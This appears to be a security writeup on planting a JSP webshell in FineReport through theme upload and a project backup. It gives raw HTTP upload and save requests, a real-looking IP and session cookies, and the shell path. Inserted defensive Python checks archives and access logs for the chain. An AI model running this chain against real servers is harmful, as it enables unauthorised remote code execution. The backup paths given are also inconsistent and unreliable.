Exploitation
FineReport: obtaining a shell via theme upload (Management system -> Appearance configuration)
Place a shell.jsp webshell inside the zip archive uploaded through "Add theme" (if the "Add theme" feature is not available, craft the request directly):
POST /WebReport/ReportServer?op=fr_attach&cmd=ah_upload&filename=test.zip&width=240&height=198 HTTP/1.1
Host: xxx
Content-Length: 749
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=AjaxUploadBoundary1638899444076, multipart/form-data
Accept: */*
Origin: https://xx
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

------WebKitFormBoundaryNN5BrMluNxGE4HCB
Content-Disposition: form-data; name="FileData"; filename="test.zip"
Content-Type: application/zip

(zip archive contents)
------WebKitFormBoundaryNN5BrMluNxGE4HCB--
Note:
Using Burp Suite's "Paste from file" for the archive here causes problems; modifying it in Burp Suite as follows makes it work normally.
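A server-side check a defender would want at this upload step, as an added example (not FineReport's code and not from the original writeup): inspect the theme package in memory before anything is extracted, and reject server-executable file types such as .jsp, path-traversal entries, symbolic links and oversized archives. The allowed and rejected extension sets, the size limits and the build_zip helper are assumptions chosen for the example, not values from the product.

```python
import io
import posixpath
import stat
import zipfile

# Constructed policy for this example: file types a servlet container would execute
# are never acceptable in a static theme package, and only a short list of static
# asset types is expected. Tune both sets to the deployment.
EXECUTABLE_EXTENSIONS = {".jsp", ".jspx", ".jspf", ".jsw", ".jsv", ".class", ".jar", ".war"}
ALLOWED_EXTENSIONS = {".css", ".png", ".jpg", ".jpeg", ".gif", ".svg",
                      ".woff", ".woff2", ".ttf", ".json", ".xml"}


def escapes_root(name):
    """True if a member path would land outside the extraction directory."""
    name = name.replace("\\", "/")
    if name.startswith("/"):
        return True
    norm = posixpath.normpath(name)
    return norm == ".." or norm.startswith("../")


def validate_theme_archive(data, max_members=500, max_total_bytes=50 * 1024 * 1024):
    """Inspect a theme zip before extraction; returns a list of findings.

    An empty list means the archive passed every check. The archive is read
    from memory only; nothing is written to disk.
    """
    findings = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile as exc:
        return ["not a valid zip archive: %s" % exc]

    members = archive.infolist()
    if len(members) > max_members:
        findings.append("too many members (%d > %d)" % (len(members), max_members))

    total = 0
    for info in members:
        total += info.file_size
        name = info.filename.replace("\\", "/")
        if escapes_root(name):
            findings.append("path traversal: %s" % info.filename)
        # Directory entries carry no content; nothing more to check.
        if name.endswith("/"):
            continue
        # Unix-created entries keep the file mode in the high 16 bits; a symlink
        # could point the later extraction at an arbitrary location.
        if info.create_system == 3 and stat.S_ISLNK(info.external_attr >> 16):
            findings.append("symbolic link in archive: %s" % info.filename)
        ext = posixpath.splitext(name)[1].lower()
        if ext in EXECUTABLE_EXTENSIONS:
            findings.append("server-executable file in theme package: %s" % info.filename)
        elif ext not in ALLOWED_EXTENSIONS:
            findings.append("unexpected file type: %s" % info.filename)

    if total > max_total_bytes:
        findings.append("uncompressed size %d exceeds limit %d" % (total, max_total_bytes))
    return findings


def build_zip(entries):
    """Constructed helper: build an in-memory zip from a {name: bytes} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    clean = build_zip({"theme.css": b"body { color: #333; }", "img/logo.png": b"\x89PNG"})
    print("clean:", validate_theme_archive(clean))
    suspect = build_zip({"theme.css": b"", "app.jsp": b"<% %>", "../../escape.css": b""})
    print("suspect:", validate_theme_archive(suspect))
```

The check deliberately runs on the raw bytes of the upload rather than on an extracted tree, so a package that fails is never written into the theme directory at all; the same findings list can be logged to give the detection side a record of rejected uploads.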
After obtaining the upload ID, release the theme through the interface with the following request.
POST /WebReport/ReportServer?op=fs_manager&cmd=save_theme HTTP/1.1
Host: xx
Cookie: JSESSIONID=82B5084E106B1F09978248EE247E1E84; fr_password=""; fr_remember=false
Content-Length: 49
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://60.222.220.228
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://xxx/WebReport/ReportServer?op=fs
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Cookie: JSESSIONID=7BC53BE2461251A5B8A2D097FFE8986D; fr_remember=false; fr_password=; fr_username=admin; td_cookie=3756473647

id=f0757ae6-08fe-4704-9617-5dc7a3880096&serverID=
When the uploaded archive is named shell.zip, the webshell is extracted to
/webapps/WebReport/WEB-INF/resources/fstheme/fs-theme-test/ under the name app.jsp, but this directory is not a web-accessible directory, so the webshell cannot be reached over the web.
To move the webshell into a web directory, perform a full project backup; with the backup folder named "222", the file ends up under the path
/webapps/WebReport/bakup/all_bakup/manualbackup/222/WEB-INF/resources/fstheme/fs-theme-app/.
Access the shell address directly:
http://xxxx/WebReport/bakup/all_bakup/manualbackup/222/WEB-INF/resources/fstheme/fs-theme-test/app.jsp
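From the detection side, the chain above leaves three distinguishable marks in the servlet container's access log: a zip upload via op=fr_attach&cmd=ah_upload, a save via op=fs_manager&cmd=save_theme, and a request for a .jsp under a bakup/ or WEB-INF path. The following is an added example (not part of the original writeup) that scores these stages per client address over a time window; the log lines, addresses and timestamps are constructed, and the common log format, the stage names and the 30-minute window are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlparse

# Common log format as written by a Tomcat access-log valve (assumed format).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample log: addresses, timestamps and sizes are made up for the example.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Dec/2021:18:30:44 +0800] "POST /WebReport/ReportServer?op=fr_attach&cmd=ah_upload&filename=test.zip&width=240&height=198 HTTP/1.1" 200 312
10.0.0.5 - - [07/Dec/2021:18:31:02 +0800] "POST /WebReport/ReportServer?op=fs_manager&cmd=save_theme HTTP/1.1" 200 27
10.0.0.5 - - [07/Dec/2021:18:34:10 +0800] "GET /WebReport/bakup/all_bakup/manualbackup/222/WEB-INF/resources/fstheme/fs-theme-test/app.jsp HTTP/1.1" 200 1184
10.0.0.9 - - [07/Dec/2021:18:35:00 +0800] "GET /WebReport/ReportServer?op=fs HTTP/1.1" 200 5120
10.0.0.9 - - [07/Dec/2021:18:36:00 +0800] "POST /WebReport/ReportServer?op=fr_attach&cmd=ah_upload&filename=logo.png&width=240&height=198 HTTP/1.1" 200 300
"""

# The two preparatory stages that together mean a theme package was installed.
CHAIN = {"theme_zip_upload", "theme_save"}


def classify(target):
    """Map one request target to a stage of the theme-upload chain, or None."""
    url = urlparse(target)
    query = parse_qs(url.query)
    path = url.path.lower()
    op = query.get("op", [""])[0]
    cmd = query.get("cmd", [""])[0]
    filename = query.get("filename", [""])[0].lower()
    if op == "fr_attach" and cmd == "ah_upload" and filename.endswith(".zip"):
        return "theme_zip_upload"
    if op == "fs_manager" and cmd == "save_theme":
        return "theme_save"
    # A JSP served from a backup copy or from under WEB-INF should never happen
    # in normal operation; the path alone is worth an alert.
    if path.endswith((".jsp", ".jspx")) and ("/bakup/" in path or "/web-inf/" in path):
        return "jsp_from_backup_or_web_inf"
    return None


def analyse(log_text, window_minutes=30):
    """Group stage hits per client address and return a list of alert dicts."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        stage = classify(match["target"])
        if stage is None:
            continue
        ts = datetime.strptime(match["ts"], "%d/%b/%Y:%H:%M:%S %z")
        hits[match["ip"]].append((ts, stage, int(match["status"])))

    window = timedelta(minutes=window_minutes)
    alerts = []
    for ip, events in hits.items():
        events.sort(key=lambda e: e[0])
        stages = {stage for _, stage, _ in events}
        served_jsp = any(stage == "jsp_from_backup_or_web_inf" and status == 200
                         for _, stage, status in events)
        within_window = events[-1][0] - events[0][0] <= window
        if served_jsp and CHAIN <= stages and within_window:
            severity = "critical"
            reason = "theme zip uploaded, saved, and a JSP then served from a backup/WEB-INF path"
        elif served_jsp:
            severity = "high"
            reason = "JSP served from a backup or WEB-INF path"
        elif CHAIN <= stages and within_window:
            severity = "medium"
            reason = "theme zip uploaded and saved; inspect the package contents"
        else:
            continue
        alerts.append({"ip": ip, "severity": severity, "reason": reason,
                       "first": events[0][0].isoformat(), "last": events[-1][0].isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

The medium tier fires on the upload-plus-save pair alone, because a theme package is a rare administrative action and is cheap to review; the high and critical tiers key on a successful JSP response from a path that the container should never serve, which is also the condition a web-server rule denying bakup/ and WEB-INF paths would remove outright.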